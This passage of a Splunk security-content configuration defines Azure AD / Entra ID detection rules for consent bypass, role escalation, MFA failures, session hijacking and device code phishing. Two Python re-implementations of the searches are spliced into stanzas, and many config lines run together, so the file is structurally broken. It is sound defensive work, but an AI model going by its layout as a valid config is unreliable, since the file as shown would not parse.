search = `azure_monitor_aad` operationName="Add app role assignment to service principal" src_user_type=servicePrincipal | rename properties.* as * | eval roleId = mvindex('targetResources{}.modifiedProperties{}.newValue', 0) | eval roleValue = mvindex('targetResources{}.modifiedProperties{}.newValue', 1) | eval roleDescription = mvindex('targetResources{}.modifiedProperties{}.newValue', 2) | eval dest_user = mvindex('targetResources{}.id', 0) | rename initiatedBy.app.displayName as src_user | stats count earliest(_time) as firstTime latest(_time) as lastTime by src_user dest_user roleId roleValue roleDescription | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_admin_consent_bypassed_by_service_principal_filter`

[ESCU - Azure AD Application Administrator Role Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the application's identity. If the application's identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the application's identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the application's identity. If the application's identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the application's identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Administrators may legitimately assign the Application Administrator role to a user. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Application Administrator Role Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = The privileged Azure AD role Application Administrator was assigned for User $user$ initiated by $initiatedBy$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Application Administrator Role Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. \
Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the application's identity. If the application's identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the application's identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant.
action.notable.param.rule_title = Azure AD Application Administrator Role Assigned
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` "operationName"="Add member to role" "properties.targetResources{}.modifiedProperties{}.newValue"="\"Application Administrator\"" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime by user initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_application_administrator_role_assigned_filter`

[ESCU - Azure AD Authentication Failed During MFA Challenge - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category.
action.escu.known_false_positives = Legitimate users may fail to respond to the MFA challenge within the time window or deny it by mistake.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Authentication Failed During MFA Challenge - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ failed to pass MFA challenge
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Authentication Failed During MFA Challenge - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.notable.param.rule_title = Azure AD Authentication Failed During MFA Challenge
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, status.additionalDetails, appDisplayName, user_agent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_authentication_failed_during_mfa_challenge_filter`

[ESCU - Azure AD Block User Consent For Risky Apps Disabled - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative step-up for consent instead. Disabling this feature could expose the organization to OAuth phishing threats. The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true", effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = This analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative step-up for consent instead. Disabling this feature could expose the organization to OAuth phishing threats. The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true", effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Legitimate changes to the 'risk-based step-up consent' setting by administrators, perhaps as part of a policy update or security assessment, may trigger this alert, necessitating verification of the change's intent and authorization.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Block User Consent For Risky Apps Disabled - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ disabled the BlockUserConsentForRiskyApps Azure AD setting.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Block User Consent For Risky Apps Disabled - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative step-up for consent instead. Disabling this feature could expose the organization to OAuth phishing threats. The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true", effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization.
action.notable.param.rule_title = Azure AD Block User Consent For Risky Apps Disabled
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Update authorization policy" | rename properties.* as * | eval index_number = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "AllowUserConsentForRiskyApps") >= 0, mvfind('targetResources{}.modifiedProperties{}.displayName', "AllowUserConsentForRiskyApps"), -1) | search index_number >= 0 | eval AllowUserConsentForRiskyApps = mvindex('targetResources{}.modifiedProperties{}.newValue',index_number) | search AllowUserConsentForRiskyApps = "[true]" | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, operationName, AllowUserConsentForRiskyApps | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_block_user_consent_for_risky_apps_disabled_filter`

[ESCU - Azure AD Concurrent Sessions From Different Ips - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an Azure AD account with concurrent sessions coming from more than one unique IP address within the search window (60 minutes as scheduled here). This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an Azure AD account with concurrent sessions coming from more than one unique IP address within the search window (60 minutes as scheduled here). This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the NonInteractiveUserSignInLogs log category, which is the category the search filters on.
action.escu.known_false_positives = A user with concurrent sessions from different IPs may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment.
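# Added example (Python, not ESCU or Microsoft code): the two Entra ID (Azure AD) AuditLogs
# detections in this file that read targetResources{}.modifiedProperties{}, the "Azure AD Admin
# Consent Bypassed by Service Principal" search (positional mvindex 0/1/2 of newValue, dest_user
# from targetResources{}.id, src_user from initiatedBy.app.displayName) and the "Azure AD Block User
# Consent For Risky Apps Disabled" search above (mvfind on displayName, then mvindex of newValue at
# the same position, compared with the literal "[true]"). Both run over constructed
# azure:monitor:aad-style events. Assumptions: src_user_type is derived from whether
# properties.initiatedBy carries an "app" or a "user" object, newValue strings are JSON-encoded
# (which is why the searches match '"Application Administrator"' and '[true]' rather than bare
# values), and the displayName strings and object ids in the sample are constructed.

```python
"""Entra ID AuditLogs modifiedProperties detections over constructed events.

Added example, not ESCU or Microsoft code. Event shapes, ids, display names and
the derivation of src_user_type from initiatedBy are assumptions made here.
"""
import json


def _constructed_event(operation, initiated_by, target_id, modified):
    """azure:monitor:aad AuditLogs event reduced to the fields the searches use."""
    return {
        "operationName": operation,
        "category": "AuditLogs",
        "properties": {
            "initiatedBy": initiated_by,
            "targetResources": [{"id": target_id, "modifiedProperties": modified}],
        },
    }


# Constructed sample events (display names and ids are made up).
APP_ROLE_PROPS = [
    {"displayName": "AppRole.Id", "newValue": '"11111111-1111-1111-1111-111111111111"'},
    {"displayName": "AppRole.Value", "newValue": '"Directory.ReadWrite.All"'},
    {"displayName": "AppRole.Description", "newValue": '"Read and write directory data"'},
]
SAMPLE_EVENTS = [
    # 1. a service principal grants an app role to another service principal: hit
    _constructed_event("Add app role assignment to service principal",
                       {"app": {"displayName": "Automation SP", "servicePrincipalId": "sp-0001"}},
                       "sp-0002", APP_ROLE_PROPS),
    # 2. the same grant performed by a human admin (src_user_type=user): not a hit
    _constructed_event("Add app role assignment to service principal",
                       {"user": {"userPrincipalName": "admin@example.com"}},
                       "sp-0002", APP_ROLE_PROPS),
    # 3. AllowUserConsentForRiskyApps flipped to true, i.e. step-up consent disabled: hit.
    #    It is deliberately not the first modified property, to exercise the index pairing.
    _constructed_event("Update authorization policy",
                       {"user": {"userPrincipalName": "admin@example.com"}},
                       "authorizationPolicy",
                       [{"displayName": "ConstructedOtherSetting", "oldValue": '"a"', "newValue": '"b"'},
                        {"displayName": "AllowUserConsentForRiskyApps",
                         "oldValue": "[false]", "newValue": "[true]"}]),
    # 4. the setting is turned back off: not a hit
    _constructed_event("Update authorization policy",
                       {"user": {"userPrincipalName": "admin@example.com"}},
                       "authorizationPolicy",
                       [{"displayName": "AllowUserConsentForRiskyApps",
                         "oldValue": "[true]", "newValue": "[false]"}]),
]


def _props(event):
    return event.get("properties", {})


def initiator(event):
    """(src_user_type, src_user): servicePrincipal when initiatedBy.app is present (assumption)."""
    by = _props(event).get("initiatedBy", {})
    if by.get("app"):
        return "servicePrincipal", by["app"].get("displayName", "")
    return "user", by.get("user", {}).get("userPrincipalName", "")


def modified_properties(event):
    """Flatten targetResources[].modifiedProperties[] in order, like Splunk's
    targetResources{}.modifiedProperties{} multivalue fields."""
    out = []
    for res in _props(event).get("targetResources", []):
        out.extend(res.get("modifiedProperties", []))
    return out


def decode_value(new_value):
    """newValue/oldValue are JSON-encoded strings ('"Mail.Read"', '[true]')."""
    try:
        return json.loads(new_value)
    except (TypeError, ValueError):
        return new_value


def detect_consent_bypass(events):
    """Mirror of the admin-consent-bypass search: positional newValue extraction."""
    hits = []
    for ev in events:
        if ev.get("operationName") != "Add app role assignment to service principal":
            continue
        src_type, src_user = initiator(ev)
        if src_type != "servicePrincipal":                  # src_user_type=servicePrincipal
            continue
        values = [p.get("newValue") for p in modified_properties(ev)]
        if len(values) < 3:                                  # mvindex would yield null -> no row
            continue
        targets = _props(ev).get("targetResources", [])
        hits.append({"src_user": src_user,
                     "dest_user": targets[0].get("id", "") if targets else "",
                     "roleId": decode_value(values[0]),
                     "roleValue": decode_value(values[1]),
                     "roleDescription": decode_value(values[2])})
    return hits


def detect_risky_consent_disabled(events):
    """Mirror of the risky-apps search: pair displayName and newValue by index."""
    hits = []
    for ev in events:
        if ev.get("operationName") != "Update authorization policy":
            continue
        props = modified_properties(ev)
        names = [p.get("displayName") for p in props]
        if "AllowUserConsentForRiskyApps" not in names:     # mvfind(...) < 0
            continue
        raw = props[names.index("AllowUserConsentForRiskyApps")].get("newValue")
        if decode_value(raw) != [True]:                      # search AllowUserConsentForRiskyApps="[true]"
            continue
        hits.append({"user": initiator(ev)[1], "operationName": ev["operationName"],
                     "AllowUserConsentForRiskyApps": raw})
    return hits
```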
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Concurrent Sessions From Different Ips - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ has concurrent sessions from more than one unique IP address within the search window.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Concurrent Sessions From Different Ips - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an Azure AD account with concurrent sessions coming from more than one unique IP address within the search window (60 minutes as scheduled here). This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.notable.param.rule_title = Azure AD Concurrent Sessions From Different Ips
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` properties.authenticationDetails{}.succeeded=true category=NonInteractiveUserSignInLogs | rename properties.* as * | bucket span=30m _time | stats count min(_time) as firstTime max(_time) as lastTime dc(src_ip) AS unique_ips values(src_ip) as src_ip values(appDisplayName) as appDisplayName by user | where unique_ips > 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_concurrent_sessions_from_different_ips_filter`

[ESCU - Azure AD Device Code Authentication - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the execution of the Azure Device Code Phishing attack, which can lead to Azure Account Take-Over (ATO). The detection leverages Azure AD logs specifically focusing on authentication requests to identify the attack. This technique involves creating malicious infrastructure, bypassing Multi-Factor Authentication (MFA), and bypassing Conditional Access Policies (CAPs). The attack aims to compromise users by sending them phishing emails from attacker-controlled domains and tricking the victims into performing OAuth 2.0 device authentication. A successful execution of this attack can result in adversaries gaining unauthorized access to Azure AD, Exchange mailboxes, and the target's Outlook Web Application (OWA). This attack technique was detailed by security researchers including Bobby Cooke, Stephan Borosh, and others. It's crucial for organizations to be aware of this threat, as it can lead to unauthorized access and potential data breaches.
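# Added example (Python, not ESCU or Microsoft code): the "Azure AD Concurrent Sessions From
# Different Ips" logic from the search above, run over constructed NonInteractiveUserSignInLogs
# events. With group_by_time=False it reproduces the search as written: stats groups per user over
# the whole dispatch window, and "bucket span=30m _time" only rounds firstTime/lastTime because
# _time is not a by-field. group_by_time=True is the stricter variant a team may want, grouping by
# (user, 30-minute bucket) so only sign-ins inside the same span are counted together; it goes
# beyond the search on the page. Users, IP addresses, app names and timestamps are constructed.

```python
"""Concurrent sessions from different IPs over constructed Entra ID sign-in events.

Added example, not ESCU or Microsoft code. Sample data is constructed and the
event shape is reduced to the fields the search uses.
"""
from datetime import datetime, timezone

SIGNIN_CATEGORY = "NonInteractiveUserSignInLogs"


def parse_time(iso):
    """'2024-04-17T10:02:00Z' -> epoch seconds (UTC)."""
    return int(datetime.strptime(iso, "%Y-%m-%dT%H:%M:%SZ")
               .replace(tzinfo=timezone.utc).timestamp())


def bucket(epoch, span_seconds):
    """Splunk 'bucket span=...': floor the timestamp to the span boundary."""
    return epoch - (epoch % span_seconds)


def _signin(user, src_ip, when, app="Microsoft 365", succeeded=True,
            category=SIGNIN_CATEGORY):
    """Constructed azure:monitor:aad sign-in event reduced to the fields used here."""
    return {"time": when, "category": category, "user": user, "src_ip": src_ip,
            "properties": {"appDisplayName": app,
                           "authenticationDetails": [{"succeeded": succeeded}]}}


SAMPLE_EVENTS = [
    _signin("alice@example.com", "203.0.113.10", "2024-04-17T10:02:00Z"),
    _signin("alice@example.com", "198.51.100.7", "2024-04-17T10:07:00Z", app="Exchange Online"),
    _signin("bob@example.com", "192.0.2.5", "2024-04-17T10:05:00Z"),
    _signin("bob@example.com", "203.0.113.99", "2024-04-17T10:50:00Z"),  # next 30m bucket
    _signin("carol@example.com", "192.0.2.8", "2024-04-17T10:10:00Z"),
    _signin("carol@example.com", "192.0.2.8", "2024-04-17T10:20:00Z"),    # same IP: one device
    _signin("dave@example.com", "192.0.2.9", "2024-04-17T10:15:00Z"),
    _signin("dave@example.com", "198.51.100.9", "2024-04-17T10:16:00Z", succeeded=False),
    _signin("eve@example.com", "192.0.2.3", "2024-04-17T10:30:00Z", category="SignInLogs"),
    _signin("eve@example.com", "198.51.100.3", "2024-04-17T10:31:00Z", category="SignInLogs"),
]


def concurrent_sessions(events, span_minutes=30, group_by_time=False):
    """Rows with unique_ips > 1, per user (search as written) or per (user, bucket)."""
    span = span_minutes * 60
    groups = {}
    for ev in events:
        if ev.get("category") != SIGNIN_CATEGORY:
            continue
        details = ev.get("properties", {}).get("authenticationDetails", [])
        if not any(d.get("succeeded") is True for d in details):  # {}.succeeded=true
            continue
        t = bucket(parse_time(ev["time"]), span)                   # bucket span=30m _time
        key = (ev["user"], t) if group_by_time else (ev["user"],)
        g = groups.setdefault(key, {"user": ev["user"], "count": 0, "ips": set(),
                                    "apps": set(), "firstTime": t, "lastTime": t})
        g["count"] += 1
        g["ips"].add(ev["src_ip"])
        g["apps"].add(ev["properties"].get("appDisplayName", ""))
        g["firstTime"] = min(g["firstTime"], t)
        g["lastTime"] = max(g["lastTime"], t)
    rows = []
    for g in groups.values():
        if len(g["ips"]) > 1:                                      # where unique_ips > 1
            rows.append({"user": g["user"], "count": g["count"],
                         "unique_ips": len(g["ips"]), "src_ip": sorted(g["ips"]),
                         "appDisplayName": sorted(g["apps"]),
                         "firstTime": g["firstTime"], "lastTime": g["lastTime"]})
    return sorted(rows, key=lambda r: (r["user"], r["firstTime"]))


if __name__ == "__main__":
    for row in concurrent_sessions(SAMPLE_EVENTS):
        print(row["user"], row["unique_ips"], row["src_ip"])
```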
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery"], "mitre_attack": ["T1528", "T1566", "T1566.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the execution of the Azure Device Code Phishing attack, which can lead to Azure Account Take-Over (ATO). The detection leverages Azure AD logs specifically focusing on authentication requests to identify the attack. This technique involves creating malicious infrastructure, bypassing Multi-Factor Authentication (MFA), and bypassing Conditional Access Policies (CAPs). The attack aims to compromise users by sending them phishing emails from attacker-controlled domains and trick the victims into performing OAuth 2.0 device authentication. A successful execution of this attack can result in adversaries gaining unauthorized access to Azure AD, Exchange mailboxes, and the target's Outlook Web Application (OWA). This attack technique was detailed by security researchers including Bobby Cooke, Stephan Borosh, and others. It's crucial for organizations to be aware of this threat, as it can lead to unauthorized access and potential data breaches. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = In most organizations, device code authentication will be used to access common Microsoft service but it may be legitimate for others. Filter as needed. 
action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Device Code Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Device code requested for $user$ from $src_ip$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Device Code Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery"], "mitre_attack": ["T1528", "T1566", "T1566.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the execution of the Azure Device Code Phishing attack, which can lead to Azure Account Take-Over (ATO). The detection leverages Azure AD logs specifically focusing on authentication requests to identify the attack. This technique involves creating malicious infrastructure, bypassing Multi-Factor Authentication (MFA), and bypassing Conditional Access Policies (CAPs). The attack aims to compromise users by sending them phishing emails from attacker-controlled domains and trick the victims into performing OAuth 2.0 device authentication. 
A successful execution of this attack can result in adversaries gaining unauthorized access to Azure AD, Exchange mailboxes, and the target's Outlook Web Application (OWA). This attack technique was detailed by security researchers including Bobby Cooke, Stephan Borosh, and others. It's crucial for organizations to be aware of this threat, as it can lead to unauthorized access and potential data breaches. action.notable.param.rule_title = Azure AD Device Code Authentication action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs "properties.authenticationProtocol"=deviceCode | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime by user src_ip, appDisplayName, userAgent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_device_code_authentication_filter` [ESCU - Azure AD External Guest User Invited - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B 